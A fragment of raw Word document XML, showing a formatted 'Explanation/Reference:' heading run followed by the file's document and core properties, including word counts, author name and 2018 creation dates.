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SY0-501 2-26-2018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Passing Score: 850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Time Limit: 500 min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2017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administrator wants to implement a logon script that will prevent MITM attacks on the local LAN.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commands should the security administrator implement within the script to accomplish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this task?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arp - s 192.168.1.1 00-3a-d1-fa-b1-06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dig - x@192.168.1.1 mypc.comptia.com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nmap - A - T4 192.168.1.1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tcpdump - lnv host 192.168.1.1 or either 00:3a:d1:fa:b1:06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is the BEST reason for salting a password hash before it is stored in a database?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To prevent duplicate values from being stored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To make the password retrieval process very slow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To protect passwords from being saved in readable format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To prevent users from using simple passwords for their access credentials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actor downloads and runs a program against a corporate login page. The program imports a list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usernames and passwords, looking for a successful attempt. Which of the following terms BEST describes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actor in this situation?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Script kiddie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Hacktivist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Cryptologist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Security auditor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organization wants to utilize a common, Internet-based third-party provider for authorization and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authentication. The provider uses a technology based on OAuth 2.0 to provide required services. To which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following technologies is the provider referring?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OpenID Connect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SAML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XACML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LDAP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A penetration tester harvests potential usernames from a social networking site. The penetration tester then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uses social engineering to attempt to obtain associated passwords to gain unauthorized access to shares on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network server. Which of the following methods is the penetration tester MOST likely using?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Escalation of privilege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SQL injection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Active reconnaissance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Proxy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could occur when both strong and weak ciphers are configured on a VPN concentrator?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An attacker could potentially perform a downgrade attack.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The connection is vulnerable to resource exhaustion.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The integrity of the data could be at risk.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VPN concentrator could revert to L2TP.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The IPSec payload reverted to 16-bit sequence numbers.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is the BEST choice for a security control that represents a preventive and corrective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logical control at the same time?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Security awareness training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Antivirus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Firewalls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Intrusion detection system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web developers improves client access to the company's REST API. Authentication needs to be tokenized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but not expose the client's password. Which of the following methods would BEST meet the developer's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requirements?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SAML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LDAP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OAuth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Shibboleth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vulnerability scan is being conducted against a desktop system. The scan is looking for files, versions, and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registry values known to be associated with system vulnerabilities. Which of the following BEST describes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type of scan being performed?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Non-intrusive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Authenticated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Credentialed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Active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analyst is updating a BIA document. The security analyst notices the support vendor's time to replace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server hard drive went from eight hours to two hours. Given these new metrics, which of the following can be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concluded?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MTTR is faster.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The MTTR is slower.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The RTO has increased.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RTO has decreased.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The MTTF has increased.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F. The MTTF has decreased.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could help detect trespassers in a secure facility?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Faraday cages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Motion-detection sensors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Tall, chain-link fencing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Security guards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Smart cards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IT department is deploying new computers. To ease the transition, users will be allowed to access their old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and new systems. The help desk is receive reports that users are experiencing the following error when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attempting to log in to their previous system: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Logon Failure: Access Denied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can cause this issue?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Permission issues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Access violations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Certificate issues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Misconfigured devices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third-party penetration testing company was able to successfully use an ARP cache poison technique to gain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root access on a server. The tester successfully moved to another server that was not in the original network.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Which of the following is the MOST likely method used to gain access to the other host?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Backdoor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Pivoting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Persistance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Logic bomp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Ann, a security administrator, wants to ensure credentials are encrypted in transit when implementing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RADIUS server for SSO. Which of the following are needed given these requirements?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Public key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Shared key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Elliptic curve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MD5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Private key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F. DES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POODLE attack is a MITM exploit that affects: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TLS1.0 with CBC mode cipher.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SSLv2.0 with CBC mode cipher,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SSLv3.0 with CBC mode cipher.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SSLv3.0 with ECB mode cipher.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To determine the ALE of a particular risk, which of the following must be calculated? (Select TWO).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ARO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ROI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RPO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RTO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are used to increase the computing time it takes to brute force a password using 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offline attack?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XOR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PBKDF2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bcrypt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HMAC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RIPEMD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>QUESTION 18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Users in a corporation currently authenticate with a username and password. A security administrator wishes to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implement two-factor authentication to improve security. Which of the following authentication methods should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be deployed to achieve this goal?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Security question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Smart card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Passphrase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CAPTCHA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administrator needs to address the following audit recommendations for a public-facing SFTP server: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Users should be restricted to upload and download files to their own home directories only.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Users should not be allowed to use interactive shell login.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configuration parameters should be implemented? (Select TWO).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PermitTunnel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ChrootDirectory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PermitTTY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AllowTcpForwarding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IgnoreRhosts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organization recently moved its custom web applications to the cloud, and it is obtaining managed services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of the back-end environment as part of its subscription. Which of the following types of services is this company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now using?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SaaS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CASB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IaaS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PaaS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Security Broker (CASB) gives you both visibility into your entire cloud stack and the security automation tool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your IT team needs.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is commonly done as part of a vulnerability scan?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Exploiting misconfigured applications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Cracking employee passwords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Sending phishing emails to employees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Identifying unpatched workstations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company is evaluating cloud providers to reduce the cost of its internal IT operations. The company's aging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systems are unable to keep up with customer demand. Which of the following cloud models will the company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MOST likely select?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PaaS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SaaS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IaaS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BaaS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After a security incident, management is meeting with involved employees to document the incident and its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aftermath. Which of the following BEST describes this phase of the incident response process?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Lessons learned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Recovery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Identification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Preparation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After an identified security breach, an analyst is tasked to initiate the IR process. Which of the following is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NEXT step the analyst should take?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Recovery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Identification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Preparation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Documentation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Escalation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user needs to send sensitive information to a colleague using PKI. Which of the following concepts apply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when a sender encrypts the message hash with the sender's private key?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Non-repudiation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Email content encryption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Steganography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Transport security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Message integrity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technician suspects that a system has been compromised. The technician reviews the following log entry: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WARNING - hash mismatch: C:\Window\SysWOW64\user32.dll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WARNING - hash mismatch: C:\Window\SysWOW64\kernel32.dll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Based solely on the above information, which of the following types of malware is MOST likely installed on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system?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Rootkit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Ransomware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Trojan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Backdoor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As part of a new BYOD rollout, a security analyst has been asked to find a way to securely store company data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on personal devices. Which of the following would BEST help to accomplish this?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Require the use of an eight-character PIN.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Implement containerization of company data.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Require annual AUP sign-off.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Use geofencing tools to unlock devices while on the premises.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web server, which is configured to use TLS with AES-GCM-256, SHA-384, and ECDSA, recently suffered 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information loss breach. Which of the following is MOST likely the cause?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Insufficient key bit length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Weak cipher suite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Unauthenticated encryption method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Poor implementation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incident involving a workstation that is potentially infected with a virus has occurred. The workstation may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have sent confidential data to an unknown internet server. Which of the following should a security analyst do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FIRST?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Make a copy of everything in memory on the workstation.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Turn off the workstation.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Consult the information security policy.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Run a virus scan.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BEST describes an important security advantage yielded by implementing vendor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diversity?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Sustainability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Homogeneity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C. Resiliency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Configurability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dumpster diver recovers several hard drives from a company and is able to obtain confidential data from one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of the hard drives. The company then discovers its information is posted online. Which of the following methods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would have MOST likely prevented the data from being exposed?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Removing the hard drive from its enclosure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Using software to repeatedly rewrite over the disk space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Using Blowfish encryption on the hard drives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Using magnetic fields to erase the data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manager wants to distribute a report to several other managers with the company. Some of them reside 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remote locations that are not connected to the domain but have a local server. Because there is sensitive data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within the report and the size of the report is beyond the limit of the email attachment size, emailing the report is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not an option. Which of the following protocols should be implemented to distribute the report securely? (Select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THREE)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S/MIME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SSH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SNMPv3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FTPS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SRTP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F. HTTPS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G. LDAPS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BDF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vice president at a manufacturing organization is concerned about desktops being connected to the network.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Employees need to log onto the desktops' local account to verify that a product is being created within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specifications; otherwise, the desktops should be as isolated as possible. Which of the following is the BEST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way to accomplish this?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Put the desktops in the DMZ.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Create a separate VLAN for the desktops.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Air gap the desktops.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Join the desktops to an ad-hoc network.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>QUESTION 34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in-house penetration tester has been asked to evade a new DLP system. The tester plans to exfiltrate data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through steganography. Discovery of which of the following would help catch the tester in the act?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Abnormally high numbers of outgoing instant messages that contain obfuscated text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Large-capacity USB drives on the tester's desk with encrypted zip files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Outgoing emails containing unusually large image files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Unusual SFTP connections to a consumer IP address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member of the admins group reports being unable to modify the "changes" file on a server. The permissions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on the file are as follows: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Permissions User Group File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-rwxrw-r--+ Admins Admins changes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Based on the output above, which of the following BEST explains why the user is unable to modify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"changes" file?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SELinux mode on the server is set to "enforcing."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The SELinux mode on the server is set to "permissive."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An FACL has been added to the permissions for the file.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admins group does not have adequate permissions to access the file.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penetration tester is conducting an assessment on Comptia.org and runs the following command from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coffee shop while connected to the public Internet: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c:\nslookup -querytype=MX comptia.org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Server: Unknown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Address: 198.51.100.45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comptia.org MX preference=10, mail exchanger = 92.68.102.33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comptia.org MX preference=20, mail exchanger = exchg1.comptia.org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exchg1.comptia.org internet address = 192.168.102.67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should the penetration tester conclude about the command output?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public/private views on the Comptia.org DNS servers are misconfigured.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Comptia.org is running an older mail server, which may be vulnerable to exploits.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The DNS SPF records have not been updated for Comptia.org.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192.168.102.67 is a backup mail server that may be more vulnerable to attack.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analyst is inspecting the results of a recent internal vulnerability scan that was performed against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intranet services. The scan reports include the following critical-rated vulnerability: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Title: Remote Command Execution vulnerability in web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Rating: Critical (CVSS 10.0)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Threat actor: any remote user of the web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Confidence: certain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Recommendation: apply vendor patches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actions should the security analyst perform FIRST?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A. Escalate the issue to senior management.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Apply organizational context to the risk rating.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Organize for urgent out-of-cycle patching.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Exploit the server to check whether it is a false positive.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Company A agrees to provide perimeter protection, power, and environmental support with measurable goals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for Company B, but will not be responsible for user authentication or patching of operating systems within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perimeter. Which of the following is being described?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Service level agreement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Memorandum of understanding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Business partner agreement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Interoperability agreement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company is deploying smartphones for its mobile salesforce. These devices are for personal and business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 but are owned by the company. Sales personnel will save new customer data via a custom application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developed for the company. This application will integrate with the contact information stored in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smartphones and will populate new customer records onto it. The customer application's data is encrypted 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rest, and the application's connection to the back office system is considered secure. The Chief Information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Security Officer (CISO) has concerns that customer contact information may be accidentally leaked due to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limited security capabilities of the devices and the planned controls. Which of the following will be the MOST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efficient security control to implement to lower this risk?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Implement a mobile data loss agent on the devices to prevent any user manipulation with the contact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information.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Restrict screen capture features on the devices when using the custom application and the contact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information.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Restrict contact information storage dataflow so it is only shared with the customer application.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Require complex passwords for authentication when accessing the contact information.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Chief Information Security Officer (CISO) is asking for ways to protect against zero-day exploits. The CISO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is concerned that an unrecognized threat could compromise corporate data and result in regulatory fines as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well as poor corporate publicity. The network is mostly flat, with split staff/guest wireless functionality. Which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following equipment MUST be deployed to guard against unknown threats?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Cloud-based antivirus solution, running as local admin, with push technology for definition updates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B. Implementation of an off-site datacenter hosting all company data, as well as deployment of VDI for all client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computing needs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Host-based heuristic IPS, segregated on a management VLAN, with direct control of the perimeter firewall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ACLs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Behavior-based IPS with a communication link to a cloud-based vulnerability and threat feed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organization has several production-critical SCADA supervisory systems that cannot follow the normal 30-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day patching policy. Which of the following BEST maximizes the protection of these systems from malicious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software?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Configure a firewall with deep packet inspection that restricts traffic to the systems.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Configure a separate zone for the systems and restrict access to known ports.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Configure the systems to ensure only necessary applications are able to run.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Configure the host firewall to ensure only the necessary applications have listening ports.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organization identifies a number of hosts making outbound connections to a known malicious IP over port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TCP 80. The organization wants to identify the data being transmitted and prevent future connections to this IP.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should the organization do to achieve this outcome?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Use a protocol analyzer to reconstruct the data and implement a web-proxy.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Deploy a web-proxy and then blacklist the IP on the firewall.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Deploy a web-proxy and implement IPS at the network edge.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Use a protocol analyzer to reconstruct the data and blacklist the IP on the firewall.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Legal authorities notify a company that its network has been compromised for the second time in two years.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investigation shows the attackers were able to use the same vulnerability on different systems in both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attacks. Which of the following would have allowed the security team to use historical information to protect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against the second attack?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Key risk indicators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Lessons learned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Recovery point objectives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Tabletop exercise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A small company's Chief Executive Officer (CEO) has asked its Chief Security Officer (CSO) to improve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company's security posture quickly with regard to targeted attacks. Which of the following should the CSO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conduct FIRST?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Survey threat feeds from services inside the same industry.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Purchase multiple threat feeds to ensure diversity and implement blocks for malicious traffic.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Conduct an internal audit against industry best practices to perform a qualitative analysis.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Deploy a UTM solution that receives frequent updates from a trusted industry vendor.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During a routine vulnerability assessment, the following command was successful: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echo "vrfy 'perl -e 'print "hi" x 500 ' ' " | nc www.company.com 25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vulnerabilities is being exploited?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Buffer overflow directed at a specific host MTA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SQL injection directed at a web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Cross-site scripting directed at www.company.com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Race condition in a UNIX shell script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forensic investigator has run into difficulty recovering usable files from a SAN drive. Which of the following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SAN features might have caused the problem?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Storage multipaths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Deduplication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iSCSI initiator encryption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Data snapshots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company offers SaaS, maintaining all customers' credentials and authenticating locally. Many large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customers have requested the company offer some form of federation with their existing authentication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infrastructures. Which of the following would allow customers to manage authentication and authorizations from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within their existing organizations?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Implement SAML so the company's services may accept assertions from the customers' authentication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servers.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Provide customers with a constrained interface to manage only their users' accounts in the company's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active directory server.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Provide a system for customers to replicate their users' passwords from their authentication service to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company's.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Use SOAP calls to support authentication between the company's product and the customers'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authentication servers.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A software development manager is taking over an existing software development project. The team currently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suffers from poor communication due to a long delay between requirements documentation and feature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delivery. This gap is resulting in an above average number of security-related bugs making it into production.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development methodologies is the team MOST likely using now?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Agile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Waterfall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Scrum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Spiral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the successful response to a data-leakage incident, the incident team lead facilitates an exercise that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focuses on continuous improvement of the organization's incident response capabilities. Which of the following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activities has the incident team lead executed?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Lessons learned review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Root cause analysis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Incident audit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Corrective action exercise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analyst is attempting to break into a client's secure network. The analyst was not given prior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information about the client, except for a block of public IP addresses that are currently in use. After network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enumeration, the analyst's NEXT step is to perform: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 gray-box penetration test.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 risk analysis.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 vulnerability assessment.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an external security audit.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a red team exercise.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architect has convened a meeting to discuss an organization's key management policy.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organization has a reliable internal key management system, and some argue that it would be best to manage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cryptographic keys internally as opposed to using a solution from a third party. The company should use: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current internal key management system.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 third-party key management system that will reduce operating costs.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risk benefits analysis results to make a determination.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 software solution including secure key escrow capabilities.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>QUESTION 52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After a recent internal breach, a company decided to regenerate and reissue all certificates used in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transmission of confidential information. The company places the greatest importance on confidentiality and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non-repudiation, and decided to generate dual key pairs for each client. Which of the following BEST describes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how the company will use these certificates?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One key pair will be used for encryption and decryption. The other will be used to digitally sign the data.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One key pair will be used for encryption. The other key pair will provide extended validation.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Data will be encrypted once by each key, doubling the confidentiality and non-repudiation strength.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One key pair will be used for internal communication, and the other will be used for external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communication.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manager is creating an account management policy for a global organization with sales personnel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who must access corporate network resources while traveling all over the world. Which of the following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practices is the security manager MOST likely to enforce with the policy?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Time-of-day restrictions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Password complexity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Location-based authentication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Group-based access control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Standard naming convention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network administrator at a small office wants to simplify the configuration of mobile clients connecting to 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encrypted wireless network. Which of the following should be implemented if the administrator does not want to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provide the wireless password or certificate to the employees?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WPS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802.1x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WPA2-PSK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TKIP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administrator learns that PII, which was gathered by the organization, has been found in an open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forum. As a result, several C-level executives found their identities were compromised, and they were victims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recent whaling attack. Which of the following would prevent these problems in the future? (Select TWO).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Implement a reverse proxy.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Implement an email DLP.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Implement a spam filter.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Implement a host-based firewall.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E. Implement a HIDS.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engineer is configuring a wireless network with EAP-TLS. Which of the following activities is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requirement for this configuration?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Setting up a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Configuring federation between authentication servers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Enabling TOTP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Deploying certificates to endpoint devices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Ann is the IS manager for several new systems in which the classification of the systems' data are being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decided. She is trying to determine the sensitivity level of the data being processed. Which of the following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people should she consult to determine the data classification?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Steward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Custodian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User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Owner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BEST describes a network-based attack that can allow an attacker to take full control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vulnerable host?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Remote exploit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Amplification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Sniffing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Man-in-the-middle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systems administrator wants to generate a self-signed certificate for an internal website. Which of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steps should the systems administrator complete prior to installing the certificate on the server?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Provide the private key to a public CA.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Provide the public key to the internal CA.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Provide the public key to a public CA.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Provide the private key to the internal CA.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Provide the public/private key pair to the internal CA.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F. Provide the public/private key pair to a public CA.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analyst has received the following alert snippet from the HIDS appliance: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PROTOCOL SIG SRC.PORT DST.PORT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TCP XMAS SCAN 192.168.1.1:1091 192.168.1.2:8891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TCP XMAS SCAN 192.168.1.1:649 192.168.1.2:9001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TCP XMAS SCAN 192.168.1.1:2264 192.168.1.2:6455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TCP XMAS SCAN 192.168.1.1:3464 192.168.1.2:8744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Given the above logs, which of the following is the cause of the attack?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TCP ports on destination are all open.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FIN, URG, and PSH flags are set in the packet header.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TCP MSS is configured improperly.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There is improper Layer 2 segmentation.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controls allows a security guard to perform a post-incident review?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Detective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Preventive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Corrective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Deterrent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Attackers have been using revoked certificates for MITM attacks to steal credentials from employees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Company.com. Which of the following options should Company.com implement to mitigate these attacks?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Captive portal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Extended validation certificate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OCSP stapling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Object identifiers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Key escrow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After attempting to harden a web server, a security analyst needs to determine if an application remains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vulnerable to SQL injection attacks. Which of the following would BEST assist the analyst in making this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determination?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tracert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Fuzzer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nslookup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Nmap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netcat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company is allowing a BYOD policy for its staff. Which of the following is a best practice that can decrease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risk of users jailbreaking mobile devices?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Install a corporately monitored mobile antivirus on the devices.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Prevent the installation of applications from a third-party application store.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Build a custom ROM that can prevent jailbreaking.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D. Require applications to be digitally signed.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describes the key difference between vishing and phishing attacks?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Phishing is used by attackers to steal a person's identity.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Vishing attacks require some knowledge of the target of attack.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Vishing attacks are accomplished using telephony services.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Phishing is a category of social engineering attack.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should a security analyst perform FIRST to determine the vulnerabilities of a legacy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system?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Passive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Aggressive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Credentialed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Intrusive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components of printers and MFDs are MOST likely to be used as vectors of compromise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if they are improperly configured?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Embedded web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Spooler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Network interface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LCD control panel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hacker has a packet capture that contains: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....Joe Smith.........E289F21CD33E4F57890DDEA5CF267ED2..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...Jane.Doe...........AD1FAB10D33E4F57890DDEA5CF267ED2..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....John.Key..........3374E9E7E33E4F57890DDEA5CF267ED2..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tools will the hacker use against this type of capture?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Password cracker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Vulnerability scanner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DLP scanner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Fuzzer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user downloads and installs an MP3 converter, and runs the application. Upon running the application,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antivirus detects a new port in a listening state. Which of the following has the user MOST likely executed?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Worm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Ransomware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Bot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attacker exploited a vulnerability on a mail server using the code below.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&lt;HTML&gt;&lt;body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onload=document.location.replace ('http://hacker/post.asp?victim&amp;message =" + document.cookie + "&lt;br&gt;" +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"URL:" +"document.location) ; /&gt;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&lt;/body&gt;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&lt;/HTML&gt;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BEST explains what the attacker is doing?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attacker is replacing a cookie.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The attacker is stealing a document.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The attacker is replacing a document.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attacker is deleting a cookie.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analyst is securing smartphones and laptops for a highly mobile workforce. Priorities include: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Remote wipe capabilities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Geolocation services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Patch management and reporting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Mandatory screen locks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Ability to require passcodes and pins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Ability to require encryption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would BEST meet these requirements?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Implementing MDM software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Deploying relevant group policies to the devices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Installing full device encryption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Removing administrative rights to the devices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technician receives a device with the following anomalies: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Frequent pop-up ads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Show response-time switching between active programs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Unresponsive peripherals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technician reviews the following log file entries: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File Name Source MD5 Target MD5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Status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antivirus.exe F794F21CD33E4F57890DDEA5CF267ED2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F794F21CD33E4F57890DDEA5CF267ED2 Automatic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iexplore.exe 7FAAF21CD33E4F57890DDEA5CF29CCEA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AA87F21CD33E4F57890DDEAEE2197333 Automatic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service.exe 77FF390CD33E4F57890DDEA5CF28881F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77FF390CD33E4F57890DDEA5CF28881F Manual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USB.exe E289F21CD33E4F57890DDEA5CF28EDC0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E289F21CD33E4F57890DDEA5CF28EDC0 Stopped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Based on the above output, which of the following should be reviewed?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web application firewall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The file integrity check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The data execution prevention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removable media control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systems administrator is attempting to recover from a catastrophic failure in the datacenter. To recover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domain controller, the systems administrator needs to provide the domain administrator credentials. Which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following account types is the systems administrator using?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Guest account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Service account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User account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Local Account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organization plans to implement multifactor authentication techniques within the enterprise network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architecture. Each authentication factor is expected to be a unique control. Which of the following BEST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describes the proper employment of multifactor authentication?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Proximity card, fingerprint scanner, PIN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Fingerprint scanner, voice recognition, proximity card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Smart card, user PKI certificate, privileged user certificate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Voice recognition, smart card, proximity card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2018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Multiple organizations operating in the same vertical want to provide seamless wireless access for their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employees as they visit the other organizations. Which of the following should be implemented if all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organizations use the native 802.1x client on their mobile devices?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Shibboleth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RADIUS federation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SAML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OAuth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OpenlD connect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Upon entering an incorrect password, the logon screen displays a message informing the user that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password does not match the username provided and is not the required length of 12 characters. Which of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secure coding techniques should a security analyst address with the application developers to follow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security best practices?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Input validation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Error handling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Obfuscation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Data exposure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administrator is developing controls for creating audit trails and tracking if a PHI data breach is to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occur. The administrator has been given the following requirements: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*All access must be correlated to a user account.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*All user accounts must be assigned to a single individual.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*User access to the PHI data must be recorded.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*Anomalies in PHI data access must be reported.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*Logs and records cannot be deleted or modified.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should the administrator implement to meet the above requirements? (Select THREE).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Eliminate shared accounts.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Create a standard naming convention for accounts.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Implement usage auditing and review.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Enable account lockout thresholds.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Copy logs in real time to a secured WORM drive.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F. Implement time-of-day restrictions.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G. Perform regular permission audits and reviews.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administrator is replacing a wireless router. The configuration of the old wireless router was not documented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before it stopped functioning. The equipment connecting to the wireless network uses older legacy equipment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that was manufactured prior to the release of the 802.11i standard. Which of the following configuration options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should the administrator select for the new wireless router?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WPA+CCMP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WPA2+CCMP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WPA+TKIP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WPA2+TKIP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threat actors is MOST likely to steal a company's proprietary information to gain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market edge and reduce time to market?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Competitor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Hacktivist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C. Insider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Organized crime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BEST describes an important security advantage yielded by implementing vendor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diversity?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Sustainability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Homogeneity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Resiliency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Configurability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specifically describes the exploitation of an interactive process to access otherwise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restricted areas of the OS?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Pivoting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Process affinity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Buffer overflow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XSS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differentiates a collision attack from a rainbow table attack?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 rainbow table attack performs a hash lookup.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 rainbow table attack uses the hash as a password.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In a collision attack, the hash and the input data are equivalent.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In a collision attack, the same input results in different hashes.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analyst observes the following events in the logs of an employee workstation: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1/23 1:07:16 865 Access to C:\Users\user\temp\oasdfkh.hta has been restricted by your administrator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by the default restriction policy level.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1/23 1:07:09 1034 The scan is completed. No detections were found.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security analyst reviews the file system and observes the following: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C:\&gt;dir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C:\Users\user\temp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1/23 1:07:02 oasdfkh.hta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1/23 1:07:02 update.bat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1/23 1:07:02 msg.txt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Given the information provided, which of the following MOST likely occurred on the workstation?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Application whitelisting controls blocked an exploit payload from executing.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Antivirus software found and quarantined three malware files.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Automatic updates were initiated but failed because they had not been approved.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SIEM log aged was not tuned properly and reported a false positive.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technician has been receiving alerts from several servers that indicate load balancers have had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significant increase in traffic. The technician initiates a system scan. The scan results illustrate that the disk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space on several servers has reached capacity. The scan also indicates that incoming internet traffic to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servers has increased. Which of the following is the MOST likely cause of the decreased disk space?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Misconfigured devices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Logs and events anomalies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Authentication issues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Unauthorized software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administrator is diagnosing a server where the CPU utilization is at 100% for 24 hours. The main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culprit of CPU utilization is the antivirus program. Which of the following issue could occur if left unresolved?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MITM attack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DoS attack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DLL injection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Buffer overflow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Resource exhaustion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is used to validate the integrity of data?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CBC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Blowfish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MD5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RSA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user typically works remotely over the holidays using a web-based VPN to access corporate resources.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user reports getting untrusted host errors and being unable to connect. Which of the following is MOST likely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case?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certificate has expired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The browser does not support SSL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The user's account is locked out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VPN software has reached the seat license maximum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When it comes to cloud computing, if one of the requirements for a project is to have the most control over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systems in the cloud, which of the following is a service model that would be BEST suited for this goal?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Infrastructure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Platform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Software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Virtualization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company was recently audited by a third party. The audit revealed the company's network devices were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transferring files in the clear. Which of the following protocols should the company use to transfer files?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HTTPS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LDAPS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SCP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SNMPv3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analyst is acquiring data from a potential network incident. Which of the following evidence is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analyst MOST likely to obtain to determine the incident?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Volatile memory capture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Traffic and logs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Screenshots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System image capture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cybersecurity analyst is looking into the payload of a random packet capture file that was selected for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analysis. The analyst notices that an internal host had a socket established with another internal host over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non-standard port. Upon investigation, the origin host that initiated the socket shows this output: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usera@host&gt;history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mkdir /local/usr/bin/somedirectory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nc -1 192.168.5.1 -p 9856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ping -c 30 8.8.8.8 -a 600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rm /etc/dir2/somefile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rm -rm /etc/dir2/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traceroute 8.8.8.8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pakill pid 9487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usera@host&gt;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Given the above output, which of the following commands would have established the questionable socket?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A. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>traceroute 8.8.8.8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B. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ping -1 30 8.8.8.8 -a 600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C. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>nc -1 192.168.5.1 -p 9856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D. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pskill pid 9487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administrator has written a script that will automatically upload binary and text-based configuration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files onto a remote server using a scheduled task. The configuration files contain sensitive information. Which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of the following should the administrator use?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TOPT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SCP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FTP over a non-standard pot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SRTP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Certificate-based authentication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F. SNMPv3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analyst conducts a manual scan on a known hardened host that identifies many non-compliant items.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BEST describe why this has occurred?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Privileged-user certificated were used to scan the host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Non-applicable plug ins were selected in the scan policy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The incorrect audit file was used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output of the report contains false positives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The target host has been compromised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solutions should an administrator use to reduce the risk from an unknown vulnerability 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third-party software application?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Sandboxing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Encryption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Code signing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Fuzzing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network administrator needs to allocate a new network for the R&amp;D group. The network must not be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accessible from the Internet regardless of the network firewall or other external misconfigurations. Which of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settings should the network administrator implement to accomplish this?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Configure the OS default TTL to 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Use NAT on the R&amp;D network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Implement a router ACL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Enable protected ports on the switch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To help prevent one job role from having sufficient access to create, modify, and approve payroll data, which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following practices should be employed?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Least privilege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Job rotation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Background checks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Separation of duties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When attackers use a compromised host as a platform for launching attacks deeper into a company's network,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it is said that they are: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escalating privilege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becoming persistent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fingerprinting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pivoting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help desk received a call after hours from an employee who was attempting to log into the payroll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remotely. When the help desk returned the call the next morning, the employee was able to log into the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remotely without incident. However, the incident occurred again the next evening. Which of the following BEST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describes the cause of the issue?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password expired on the account and needed to be reset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The employee does not have the rights needed to access the database remotely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Time-of-day restrictions prevented the account from logging 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employee's account was locked out and needed to be unlocked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analyst receives an alert from the SIEM showing an IP address that does not belong to the assigned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network can be seen sending packets to the wrong gateway. Which of the following network devices is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misconfigured and which of the following should be done to remediate the issue?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Firewall; implement an ACL on the interface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Router; place the correct subnet on the interface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Switch; modify the access port to trunk port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Proxy; add the correct transparent interface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A home invasion occurred recently in which an intruder compromised a home network and accessed a WiFIenabled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baby monitor while the baby's parents were sleeping. Which of the following BEST describes how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intruder accessed the monitor?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Outdated antivirus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WiFi signal strength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Social engineering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Default configuration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engineer must install the same x.509 certificate on three different servers. The client application that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connects to the server performs a check to ensure the certificate matches the host name. Which of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should the security engineer use?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Wildcard certificate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Extended validation certificate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Certificate chaining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Certificate utilizing the SAN file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SAN = Subject Alternate Names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refers to the term used to restore a system to its operational state?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MTBF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MTTR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RTO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RPO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29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Chief Information Officer (CIO) recently saw on the news that a significant security flaws exists with a specific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version of a technology the company uses to support many critical application. The CIO wants to know if this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reported vulnerability exists in the organization and, if so, to what extent the company could be harmed. Which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of the following would BEST provide the needed information?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Penetration test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Vulnerability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Active reconnaissance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Patching assessment report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organization is expanding its network team. Currently, it has local accounts on all network devices, but with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growth, it wants to move to centrally managed authentication. Which of the following are the BEST solutions for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organization? (Sect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TACACS+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CHAP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LDAP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RADIUS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MSCHAPv2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active/passive configuration has an impact on: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confidentiality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integrity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availability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non-repudiation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attack types BEST describes a client-side attack that is used to manipulate an HTML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iframe with JavaScript code via a web browser?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Buffer overflow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MITM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XSS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SQLi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would provide additional security by adding another factor to a smart card?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Token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Proximity badge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Physical key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analyst receives an alert from a WAF with the following payload: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var data = "&lt;test test test&gt; ++ &lt;../../../../../../etc/passwd&gt;"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types of attacks is this?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Cross-site request forgery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Buffer overflow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SQL injection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JavaScript data insertion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Firewall evasion script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uses precomputed hashes to guess passwords?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Iptables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NAT tables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Rainbow tables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ARP tables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systems administrator wants to provide balance between the security of a wireless network and usability.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administrator is concerned with wireless encryption compatibility of older devices used by some employees.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would provide strong security backward compatibility when accessing the wireless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network?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Open wireless network and SSL VPN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WPA using a preshared key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WAP2 using a RADIUS back-end for 802.1x authentication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WEP with a 40-bit key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determining when it may be necessary to perform a credentialed scan against a system instead of a noncredentialed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scan, which of the following requirements is MOST likely to influence its decisions?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scanner must be able to enumerate the host OS of devices scanner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The scanner must be able to footprint the network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The scanner must be able to check for open ports with listening services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scanner must be able to audit file system permissions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38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administrator receives an alert from a third-party vendor that indicates a certificate that was installed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the browser has been hijacked at the root of a small public CA. The security administrator knows there are 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least four different browsers in use on more than a thousand computers in the domain worldwide. Which of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solutions would be BEST for the security administrator to implement to most efficiently assist with this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issue?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SSL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CRL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PKI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ACL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>QUESTION 39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After a user reports slow computer performance, a systems administrator detects a suspicious file, which was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installed as part of a freeware software package. The systems administrator reviews the output below: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c:\Windows\system32&gt;netstat -nab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Active Connections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Pronto Local Address Foreign Address State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TCP 0.0.0.0:135 0.0.0.0 RpcSs [svchoat.exe]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TCP 0.0.0.0:445 0.0.0.0 [svchost.exe]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TCP 192.168.1.10:5000 10.37.213.20 winserver.exe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UDP 192.168.1.10:1900 *.* SSDPSVR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Based on the above information, which of the following types of malware was installed on the user's computer?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Keylogger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Spyware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Worm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Bot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company has noticed multiple instances of proprietary information on public websites. It has also observed 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increase in the number of email messages sent to random employees containing malicious links and PDFs.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changes should the company make to reduce the risks associated with phishing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attacks?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Install an additional firewall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Implement a redundant email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Block access to personal email on corporate systems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Update the X.509 certificates on the corporate email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Update corporate policy to prohibit access to social media websites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F. Review access violation on the file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analyst is investigating a potential reach. Upon gathering, documenting, and securing the evidence,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actions is the NEXT step to minimize the business impact?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Launch an investigation to identify the attacking host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Initiate the incident response plan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Review lessons learned captured in the process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Remove malware and restore the system to normal operation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Joe, a salesman, was assigned to a new project that requires him to travel to a client site. While waiting for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flight, Joe, decides to connect to the airport wireless network without connecting to a VPN,and the sends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confidential emails to fellow colleagues. A few days later, the company experiences a data breach. Upon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investigation, the company learns Joe's emails were intercepted. Which of the following MOST likely caused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data breach?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Policy violation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Social engineering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Insider threat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Zero-day attack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information security specialist is reviewing the following output from a Linux server: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user@server:~$ -l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5 * * * * /usr/local/bin.backup.sh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user@server:~$ cat /usr/local/bin/backup.sh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#!/bin/bash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if ! grep --quiet joeuser /etc/passwd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the rm -rf /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fi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Based on the above information, which of the following types of malware was installed on the server?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Logic bomb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Trojan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Backdoor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Ransomware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Rootkit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company wants to ensure confidential data from storage media is sanitized in such a way that the drive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cannot be reused. Which of the following method should the technician use?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Shredding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Wiping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Low-level formatting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Repartitioning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Overwriting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forensic expert is given a hard drive from a 